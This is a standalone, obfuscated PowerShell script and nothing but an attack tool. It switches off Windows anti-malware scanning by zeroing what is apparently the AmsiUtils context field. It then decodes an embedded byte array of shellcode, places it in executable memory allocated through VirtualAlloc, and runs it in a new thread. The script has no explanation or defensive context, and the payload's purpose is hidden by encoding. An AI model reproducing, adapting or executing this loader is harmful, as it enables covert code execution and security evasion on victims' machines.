
function NIUnefTvKWD {
    Param ($DarfynBGRPBuNWBeBUtcI, $SkBnMCjsyHQFTY)
    $irwvjpoDlrIsQrpm = ([AppDomain]::CurrentDomain.GetAssemblies() | ? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $UeBtFoEumtKipbzpW=@()
    $irwvjpoDlrIsQrpm.GetMethods() | % {If($_.Name -eq "GetProcAddress") {$UeBtFoEumtKipbzpW+=$_}}
    return $UeBtFoEumtKipbzpW[0].Invoke($null, @(($irwvjpoDlrIsQrpm.GetMethod('GetModuleHandle')).Invoke($null, @($DarfynBGRPBuNWBeBUtcI)), $SkBnMCjsyHQFTY))
}

function mRnODaBXpdwvzVRNa {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $XPVeoszxMcPJludsBUlWMI,
        [Parameter(Position = 1)] [Type] $ZPppxLmuQOgWbyRhPCEYUn = [Void]
    )
    $VdtgBVZGxbs = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
    $VdtgBVZGxbs.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $XPVeoszxMcPJludsBUlWMI).SetImplementationFlags('Runtime, Managed')
    $VdtgBVZGxbs.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ZPppxLmuQOgWbyRhPCEYUn, $XPVeoszxMcPJludsBUlWMI).SetImplementationFlags('Runtime, Managed')
    return $VdtgBVZGxbs.CreateType()
}
$uDadzSIUeuZEqWUl=[Ref].Assembly.GetTypes();Foreach($DNlKfHTToOeaNn in $uDadzSIUeuZEqWUl) {if ($DNlKfHTToOeaNn.Name -like "*iUt*") {$pgKqkRMTzXw=$DNlKfHTToOeaNn}};$PYwjtjmmBSvqbIqDfWhWd=$pgKqkRMTzXw.GetFields('NonPublic,Static');Foreach($QVRRiNiLZxcl in $PYwjtjmmBSvqbIqDfWhWd) {if ($QVRRiNiLZxcl.Name -like "*Contex*") {$HMqMnsquQfpyuUDDLi=$QVRRiNiLZxcl}};$vQVTqmdUTHJDUA=$HMqMnsquQfpyuUDDLi.GetValue($null);[IntPtr]$YYZcKBbNoCyaWzPf=$vQVTqmdUTHJDUA;[Int32[]]$mymfyKEdyUpOzAcmCOcfer = @(0);[System.Runtime.InteropServices.Marshal]::Copy($mymfyKEdyUpOzAcmCOcfer, 0, $YYZcKBbNoCyaWzPf, 1)
$GtqqupZiftvGuOhpe = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((NIUnefTvKWD kernel32.dll VirtualAlloc), (mRnODaBXpdwvzVRNa @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
[Byte[]] $mfyKEdyUpOzAcmCOc = 0x4a,0x33,0xcb,0x4a,0x83,0xeb,0xdc,0x1,0x1,0x1,0x4a,0x8f,0x7,0xf1,0x1,0x1,0x1,0x4a,0xbd,0xd4,0xc4,0x0,0xab,0x70,0xad,0xd0,0x58,0x4a,0x33,0x5a,0x29,0x4a,0x2f,0xfa,0x1,0x1,0x1,0xe4,0xf6,0x30,0x8c,0x7f,0x4f,0xa0,0x45,0x10,0x58,0xd4,0xc4,0xc1,0xfa,0x31,0xfd,0x9e,0x9,0x86,0x8c,0xd1,0x7d,0xd,0xe5,0x47,0x6,0xb4,0x8c,0x77,0xfd,0x78,0xe5,0x47,0x6,0xf4,0x8c,0x77,0xdd,0x40,0xe5,0xc3,0xe3,0x9a,0x8a,0xb5,0x9a,0xa9,0xe5,0x1,0x98,0x80,0x0,0xa1,0xd7,0x6e,0x89,0xf0,0x19,0x15,0xd,0xf5,0xea,0x71,0x6c,0x2e,0xbd,0x82,0x85,0xb1,0xe3,0xe7,0xfb,0xf0,0xdf,0x92,0x0,0xb8,0xaa,0xc0,0x22,0x50,0xe0,0xd4,0xc4,0x0,0xe3,0xed,0x6d,0xbc,0x33,0x9c,0xc5,0x30,0xfb,0xe7,0xe5,0xd8,0x14,0x5b,0x84,0xe0,0xe2,0x71,0x7d,0x2f,0x2,0x9c,0x3f,0x39,0xea,0xe7,0xa1,0x48,0x20,0xd5,0x16,0xb5,0x9a,0xa9,0xe5,0x1,0x98,0x80,0x85,0x41,0x62,0x65,0xec,0xd1,0x99,0xec,0x24,0x8d,0x5a,0x24,0xaa,0x84,0x74,0xdc,0x89,0xc9,0x7a,0x1d,0x75,0x98,0x14,0x5b,0x84,0xdc,0xe2,0x71,0x7d,0xaa,0x19,0x5b,0xd0,0xb8,0xef,0xe7,0xed,0xd4,0x21,0xd5,0x14,0xc1,0x24,0x6c,0x25,0x88,0x59,0x4,0x85,0xa8,0xea,0x38,0xf7,0x99,0xe,0x95,0x9c,0xc1,0xf2,0x31,0xf3,0x88,0xd7,0x40,0xe4,0xc1,0xfd,0x93,0x4d,0x98,0x19,0x8d,0x9a,0xb8,0x24,0x7e,0x44,0x9b,0xab,0x2f,0x3f,0xa5,0xe3,0xd6,0xac,0xd0,0x58,0xd4,0xc4,0x0,0xab,0x70,0xe5,0x45,0xdd,0xd5,0xc5,0x0,0xab,0x31,0x13,0x1,0xdf,0xbf,0x47,0x3,0x7e,0xd7,0x4d,0xd5,0x7e,0xda,0x85,0x46,0x11,0xfd,0x18,0x55,0xab,0x9,0x8c,0x7f,0x6f,0x48,0x99,0xca,0x2c,0xda,0x44,0x7,0x4b,0x1d,0xb0,0x77,0x13,0xc3,0xb2,0x93,0xc5,0x70,0xf4,0x91,0xe1,0xa,0x3f,0x2d,0xec,0x56,0xf9,0x9b,0x41,0xbe,0xa8,0x93,0xe0,0x1f,0xf9,0x9f,0x31,0xa3,0xb8,0x9d,0xc6,0x5f,0x9b,0x94,0x3a,0xbf,0xb8,0x9d,0xdb,0x11,0xd1,0xe2,0x35,0xac,0xa9,0x0,0xab,0x70,0xad,0xd0,0x58
for ($n=0;$n -le $mfyKEdyUpOzAcmCOc.length-1;$n++) {$mfyKEdyUpOzAcmCOc[$n] = ($mfyKEdyUpOzAcmCOc[$n] - 2) -band 0xff}
[System.Runtime.InteropServices.Marshal]::Copy($mfyKEdyUpOzAcmCOc, 0, $GtqqupZiftvGuOhpe, $mfyKEdyUpOzAcmCOc.length)
$sxTwJVeuiFIXmegni = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((NIUnefTvKWD kernel32.dll CreateThread), (mRnODaBXpdwvzVRNa @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$GtqqupZiftvGuOhpe,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((NIUnefTvKWD kernel32.dll WaitForSingleObject), (mRnODaBXpdwvzVRNa @([IntPtr], [Int32])([Int]))).Invoke($sxTwJVeuiFIXmegni, 0xFFFFFFFF)
